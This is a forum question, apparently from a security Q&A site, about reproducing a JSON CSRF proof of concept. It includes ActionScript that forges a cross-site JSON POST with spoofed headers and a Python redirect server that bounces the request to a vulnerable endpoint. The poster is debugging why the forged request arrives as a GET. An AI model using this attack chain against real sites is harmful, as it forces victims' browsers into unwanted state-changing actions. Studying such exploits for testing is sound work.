0

I was trying to recreate a POC where an endpoint didn't have CSRF protection and was exposing a form submission.

So, I have read these ( before asking here ):

  1. Vimeo hackerone Report by avlidienbrunn
  2. GeekBoy's Article on JSON CSRF
  3. StackOverflow Question : csrf-with-json-post-when-content-type-must-be-application-json
  4. Exploiting CSRF on JSON Endpoints

My Action Script code looks like this : 

package
{
  import flash.display.Sprite;
  import flash.net.URLLoader;
  import flash.net.URLRequest;
  import flash.net.URLRequestHeader;
  import flash.net.URLRequestMethod;

public class csrf extends Sprite
  {
    public function csrf()
    {
      super();
      var member1:Object = null;
      var myJson:String = null;
      member1 = new Object();
      member1 = {
          "user_id":36427093
      };
      var myData:Object = member1;
      myJson = JSON.stringify(myData);
      var url:String = "http://my-server:8000/";
      var request:URLRequest = new URLRequest(url);
      request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
      request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
      request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
      request.data = myJson;
      request.method = URLRequestMethod.POST;
      var urlLoader:URLLoader = new URLLoader();

try
      {
          urlLoader.load(request);
          return;
      }
      catch(e:Error)
      {
          trace(e);
          return;
      }
    }
  }
}

My python pyredirector.py looks like this : 

import BaseHTTPServer
import time
import sys

HOST = '' 
PORT = 8000
vulnerable_endpoint="https://some-vulnerable-endpoint-here"

class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_POST(s):
    if s.path == '/csrf.swf':
      s.send_response(200)
      s.send_header("Content-Type","application/x-shockwave-flash")
      s.end_headers()
      s.wfile.write(open("csrf.swf", "rb").read())  # csrf.swf is the filename you compiled the above actionscript to
      return 
    s.send_response(307)
    s.send_header("Location", vulnerable_endpoint)
    s.end_headers()
  def do_GET(s):
    print(s.path)
    s.do_POST()

if __name__ == '__main__':
  server_class = BaseHTTPServer.HTTPServer
  httpd = server_class((HOST,PORT), RedirectHandler)
  print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
  try:
    httpd.serve_forever()
  except KeyboardInterrupt:
    pass
  httpd.server_close()
  print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)

Problem

Now, when I go to http://my-server:8000/, the csrf.swf redirects me to the vulnerable-endpoint but it makes a GET request and so my json payload is dropped and the CSRF doesn't happen.

Although I have the line in ActionScript's code request.method = URLRequestMethod.POST;.

Now, I haven't done coding in ActionScript and nor do I intend to. Seeing the hackerone report and the corresponding video PoC, the reporter's PoC worked just fine ( however it was 4 years back ).

I don't understand why it's forwarding as GET request.

Thanks for bearing with my ignorance and naiveness.
Temporarya

temporarya
  • 121
  • 1
  • 6
  • How did you confirm that it is making a get request instead of a post? Packet Capture? – DarkMatter Feb 15 '19 at 20:26
  • You can see it in Network tab, in Chrome's developer tools option – temporarya Feb 15 '19 at 20:35
  • If I'm reading this right when you navigate to http://my-server:8000/ the do_GET(S) runs, which calls do_POST(). If you want to process the initial get as a post then you may need to pass "S" when you call s.do_POST(S) from do_GET() – Daisetsu Feb 15 '19 at 21:23
  • It's `self` , as you can see in `do_GET()`, it's taken from the 4th article I mentioned in my post. – temporarya Feb 15 '19 at 21:30

0 Answers0